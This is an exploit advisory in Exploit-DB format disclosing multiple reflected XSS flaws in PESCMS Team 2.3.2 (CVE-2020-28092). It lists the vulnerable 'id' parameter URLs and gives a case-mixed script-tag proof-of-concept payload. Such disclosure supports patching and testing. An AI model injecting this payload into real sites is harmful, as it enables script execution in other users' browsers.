17 lines
No EOL
574 B
Text
17 lines
No EOL
574 B
Text
# Exploit Title: PESCMS TEAM 2.3.2 - Multiple Reflected XSS
|
|
# Date: 2020-11-18
|
|
# Exploit Author: icekam
|
|
# Vendor Homepage: https://www.pescms.com/
|
|
# Software Link: https://github.com/lazyphp/PESCMS-TEAM
|
|
# Version: PESCMS Team 2.3.2
|
|
# CVE: CVE-2020-28092
|
|
|
|
PESCMS Team 2.3.2 has multiple reflected XSS via the id
|
|
|
|
parameter:?g=Team&m=Task&a=my&status=3&id=,?g=Team&m=Task&a=my&status=0&id=,?g=Team&m=Task&a=my&status=1&id=,?g=Team&m=Task&a=my&status=10&id=
|
|
|
|
please refer to: https://github.com/lazyphp/PESCMS-TEAM/issues/6
|
|
|
|
now I input payload :
|
|
|
|
"><ScRiPt>alert(1)</ScRiPt> |